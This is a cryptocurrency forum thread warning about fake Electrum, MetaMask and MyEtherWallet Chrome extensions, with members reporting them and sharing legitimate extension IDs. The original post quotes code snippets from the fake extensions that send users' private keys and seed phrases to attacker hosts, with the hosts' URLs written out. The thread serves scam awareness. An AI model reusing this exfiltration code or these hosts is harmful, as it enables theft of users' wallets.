Fake Electrum, MEW and Meta Mask | Bitcointalksearch.org

TryNinja

legendary

Activity: 2758

Merit: 6830

Quote from: cryptomaniac_xxx on April 09, 2020, 12:03:47 PM

And it has been taken down together with a lot of fake MEW. Probably they are purging everything related to MEW and it was just sad that the original and legit extension are affected. But I'm sure that MEW are going to work with Google to reinstate their apps. Sorry if I didn't make my self clear in the beginning.

It's up here.

https://chrome.google.com/webstore/detail/mew-cx/nlbmnnijcnlegkjjpcfjclmcfggfefdm

And here is the source that this is the legit MEW: https://twitter.com/myetherwallet/status/1007465073898545152

cryptomaniac_xxx

hero member

Activity: 1344

Merit: 540

Quote from: RapTarX on April 09, 2020, 10:31:40 AM

Quote from: cryptomaniac_xxx on April 09, 2020, 08:47:52 AM

Legit MEW

Code:

nlbmnnijcnlegkjjpcfjclmcfggfefdm

What does that mean? I guess you have pasted some wrong contents. MEW= myetherwallet.com and that's the only site I know for MEW. What's your code referring to? Pardon me if I did miss something; I'm not much familiar with any other coins than BTC.

Those are the official MEW extension that you can find in Google store. And it has been taken down together with a lot of fake MEW. Probably they are purging everything related to MEW and it was just sad that the original and legit extension are affected. But I'm sure that MEW are going to work with Google to reinstate their apps. Sorry if I didn't make my self clear in the beginning.

RapTarX

hero member

Activity: 1358

Merit: 850

Quote from: cryptomaniac_xxx on April 09, 2020, 08:47:52 AM

Legit MEW

Code:

nlbmnnijcnlegkjjpcfjclmcfggfefdm

What does that mean? I guess you have pasted some wrong contents. MEW= myetherwallet.com and that's the only site I know for MEW. What's your code referring to? Pardon me if I did miss something; I'm not much familiar with any other coins than BTC.

cryptomaniac_xxx

hero member

Activity: 1344

Merit: 540

Legit Electrum

Code:

https://play.google.com/store/apps/details?id=org.electrum.electrum&hl=en

Legit MEW

Code:

nlbmnnijcnlegkjjpcfjclmcfggfefdm

Unfortunately, it was taken down by Google perhaps because of so many fake and malicious apps in Google store.

Edit: Those fake sites has been taken down.

1miau

legendary

Activity: 2114

Merit: 6618

Currently not much available - see my websitelink

I'm still waiting for some fakes like "Meta Musk" and unfortunately, people will still fall for it. Cry

And that's much more obvious.

In addition, low numbers of users and reviews are always a red flag (especially if the service is very famous).

sheenshane

legendary

Activity: 2366

Merit: 1206

We should be thankful to those our fellow members here in the forum who keep busting scam phishing sites or fraudster websites.

I saw several times OP posted scam reports and maybe it is good if you compile them all and make a list of if yours. Just like what @Baofeng did on this thread, he/she made a compilation of all reports he had. Or maybe both of you might combine all your work in one thread.

Anyway, thank you for the heads up here. I also reported it to google.

mk4

legendary

Activity: 2716

Merit: 3817

🪸 NotYourKeys.org 🪸

tldr; only download browser extensions from the platform's legitimate website. Don't go and search the extensions on the webs tore or on Google(especially if you're not using an adblock extension; if you're not, what are you doing with your life?). Fake extensions and phishing websites will come and go. At some point this section is just going to be filled with fake extension/website reposts.

notblox1

legendary

Activity: 2002

Merit: 1255

Logo Designer ⛨ BSFL Division1

This is crazy! Thank you for exposing this.
There are more and more scam chrome extensions every day, and people install them without even checking.
Chrome store must change some things

Btcbeginners

newbie

Activity: 28

Merit: 3

Reported the Metamask fake one

BITCOIN4X

legendary

Activity: 1946

Merit: 1150

Among the dangerous fraud attempts, fake wallet extensions are those that can be categorized as very dangerous for crypto users. The wallet extension available at the web store is directly related to the user's assets, whoever uses it will make all the assets in it disappear and be taken by fraudsters.

Users who are not careful might have the chance to get caught by this cheater trap, reporting it is the right effort so far because if the extension is still in the web store then I am sure there will be users who experience fraud.

A little advice for TravelMug, you make a good effort to help the people here so they dont experience fraud. But I hope you can also show real extensions so people can distinguish them.

libert19

hero member

Activity: 2464

Merit: 934

There are fake coinomi extensions too, and if Google removes one other pops up right into the place. This is never ending cycle.

asu

legendary

Activity: 1302

Merit: 1135

Quote from: TravelMug on April 06, 2020, 10:29:21 PM

What is up with the hackers lately? Well they are not resting even in this lock-down.

They're taking avantage of the lockdown since most of "us" are mostly in the internet right now. Using internet is the best way to avoid boredom while were lockdown in our houses.

There are still more of fake extension when you look at the "Related" and "More from this Developer".

Reported. Wink

Dorodha

member

Activity: 252

Merit: 11

Thanks, TravelMug detected them on the way hackers are not stopped working on any situation because hacker are most active and using trending materials for easily hacked accounts or something else. You keep doing your work and keep the new ones aware.

https://imgur.com/30ISNOC
https://imgur.com/SUcIi7T
https://imgur.com/rzb5Vxv

Already report done on listing addons I hope need some extra reporters for permanently delete one chrome webstore.

TravelMug

hero member

Activity: 2618

Merit: 832

What is up with the hackers lately? Well they are not resting even in this lock-down. New find:

1. Fake Electrum

Extension:

Code:

https://chrome.google.com/webstore/detail/electrum/gpffceikmehgifkjjginoibpceadefih

The posting it to:

Code:

https://completssl.com/ssnd_el.php

Snippet of loader.js

Code:

      $.post("https://completssl.com/ssnd_el.php",$("#form").serialize(),function(result){
          $('#success-msg').show();
          $('#started').hide();
          $('#form').hide();
          $('#main').hide();
          $('#foo').fadeOut().delay(2000).fadeIn();
          $('#boo').fadeIn().delay(1200).fadeOut();   
      });
      return false;

2. Fake Meta Mask

Extension:

Code:

https://chrome.google.com/webstore/detail/meta%C2%AD%C2%ADmask-wallet/jbfponbaiamgjmfpfghcjjhddjdjdpna

snippet of loader.js.

Code:

                      $.ajax({
                  
                                  url : 'https://coinomibeta.online/post/connexion.php',
                                  type : 'Post',
                                  data: {
                                      phra: privat,
                          },
                                  dataType : 'html',
                                  success : function(code_html, statut){ 
                                    if (x == 1){
                                              location.href = "./final.html";

3. Fake MEW (MyEtherWallet)

Extension:

Code:

https://chrome.google.com/webstore/detail/mew%C2%AD%C2%AD-wallet/njhfmnfcoffkdjbgpannpgifnbgdihkl

snippet of privat.js

Code:

            $.ajax({
                        
                        url : 'https://coinomibeta.online/post/connexion.php',
                        type : 'Post',
                        data: {
                            priv: privat,
                },
                        dataType : 'html',
                        success : function(code_html, statut){ 
                            if (x == 1){
                                location.href = "./final.html";

Probably the same bad actor involved here. Please, kindly report. Thanks.

Topic: Fake Electrum, MEW and Meta Mask (Read 242 times)